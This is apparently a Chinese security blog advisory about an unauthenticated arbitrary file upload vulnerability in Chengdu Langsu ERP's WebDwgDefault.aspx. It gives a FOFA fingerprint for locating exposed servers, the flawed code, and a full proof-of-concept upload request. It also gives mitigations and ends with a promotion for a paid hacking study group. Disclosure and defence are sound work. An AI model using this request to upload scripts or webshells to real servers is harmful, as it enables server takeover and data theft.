成都朗速ERP系统高危漏洞曝光!任意文件上传(附修复方案)
成都朗速ERP系统高危漏洞曝光!任意文件上传(附修复方案)
原创 WL Rot5pider安全团队 2025-05-29 01:57
点击上方蓝字 关注安全知识
紧急预警:成都朗速ERP系统高危漏洞曝光!任意文件上传(附修复方案)
一、漏洞背景
近日,国内企业信息化领域常用的成都朗速科技有限公司ERP系统(朗速ERP)
被曝存在高危任意文件上传漏洞
。攻击者可利用该漏洞直接上传恶意脚本文件(如ASP木马),实现远程控制服务器、窃取核心数据、渗透内网
等攻击。经验证,漏洞利用门槛极低,风险等级为严重(Critical)
。
二、漏洞详情
漏洞名称
:朗速ERP WebDwgDefault.aspx 任意文件上传漏洞
风险等级
:高危
影响版本
:Web_v8及以下版本(其他版本需进一步验证)
FOFA指纹
:body=”/Resource/Scripts/Yw/Yw_Bootstrap.js”
漏洞位置
:Lserp_Web_v8\Lserp_v8\WebDwgDefault.aspx
三、漏洞原理深度剖析
核心代码缺陷
(代码原文未改动):
// 漏洞代码片段(原始内容未修改)string fileTmpPath= Server.MapPath("./");protected void Page_Load(object sender, EventArgs e) { fileTmpPath= Server.MapPath("./"); // ...}string sGetFile= fileTmpPath+url;HttpPostedFile file= Request.Files[0];file.SaveAs(sGetFile); // 关键危险操作
漏洞位置:Lserp_Web_v8\Lserp_v8\WebDwgDefault.aspx漏洞触发逻辑
:
1. 路径拼接失控
fileTmpPath
直接映射网站根目录,且FileName
参数未过滤../
等路径穿越符号,攻击者可上传文件至任意路径(如../../webroot/shell.asp
)。
1. 文件类型无校验
代码中尝试检查.dll
扩展名(但存在拼写错误Filelnfo
),实际未生效,导致允许上传任意文件类型。
- 权限绕过
IsSave=true
参数未验证用户身份,攻击者无需登录即可触发上传逻辑。
四、漏洞复现(POC原文未改动)
攻击步骤
:
1. 构造恶意请求上传木马文件
(原始POC未修改):
POST /WebDwgDefault.aspx?IsSave=true&FileName=test.asp HTTP/1.1Host: ip:portX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----123Content-Length: 331------123Content-Disposition: form-data; name="file"; filename="1.aspx"<% Response.Write("hello world")%>------123--
- 访问上传文件验证漏洞
:
访问 http://目标网站/test.asp
,若页面返回hello world
,则漏洞利用成功。
五、影响范围
所有使用朗速ERP系统且未修复漏洞的企业,包括:
– 制造业、供应链等依赖ERP系统的企业
- 公网暴露的朗速ERP服务器(FOFA已发现数百台受影响资产)
六、紧急修复方案
临时处置措施
:
1. 拦截恶意请求
在WAF/防火墙中添加规则,阻断包含IsSave=true
参数的请求:
if ($args ~* "IsSave=true") { return 403; }
- 限制服务器目录权限
禁止网站目录执行脚本(以IIS为例):
icacls "C:\inetpub\wwwroot\uploads" /deny IIS_IUSRS:(M)
官方修复建议
:
– 立即联系厂商获取补丁,升级至安全版本
- 监控系统日志,排查是否存在已上传的恶意文件
七、深度防御建议
- 输入过滤
对FileName
参数强制限制为合法字符(正则示例):
^[a-zA-Z0-9_\-]+\.(dwg|dwf|dxf)$
- 文件存储隔离
将上传目录独立至非Web路径,并禁用脚本执行权限。
- 身份鉴权加固
在文件上传逻辑中增加会话验证及管理员权限检查。
八、结语
此次漏洞因代码逻辑缺陷引发,再次警示企业需严格管控文件上传功能。建议所有朗速ERP用户立即自查,并遵循最小权限原则加固系统。网络安全防线需时刻紧绷,莫让漏洞成为攻击者的入口!
【法律声明】本漏洞信息仅限用于企业安全建设,严禁非法渗透测试!
【限时
6
折!华普安全研究星球:以
原创实战
为主+SRC/内网渗透核心资源库,助你在漏洞挖掘、SRC挖掘少走90%弯路】当90%的网络安全学习者还在重复刷题、泡论坛找零散资料时,华普安全研究星球已构建起完整的「攻防实战知识生态」:
✅ 原创深度技术文档(独家SRC漏洞报告/代码审计报告)
✅ 实战中使用到的工具分享
✅ 全年更新SRC挖掘、代码审计报告(含最新0day验证思路)
✅ 漏洞挖掘思维导图
✅内部知识库目前建设中、后续进入圈子免费进入
【
实战为王
】不同于传统课程的纸上谈兵!!
后期我们将持续发布原创代码审计、src等漏洞挖掘文章,后期有些源码、挖掘思路等也会放进圈子哈~
有任何问题可后台留言
往期精选
围观
丨更多
热文
丨更多
·end·
—如果喜欢,快分享给你的朋友们吧—
我们一起愉快的玩耍吧
【免责声明】
“Rot5pider安全团队”作为专注于信息安全技术研究的自媒体平台,致力于传播网络安全领域的前沿知识与防御技术。本平台所载文章、工具及案例均用于合法合规的技术研讨与安全防护演练,严禁任何形式的非法入侵、数据窃取等危害网络安全的行为。所有技术文档仅代表作者研究过程中的技术观察,不构成实际操作建议,更不作为任何法律行为的背书。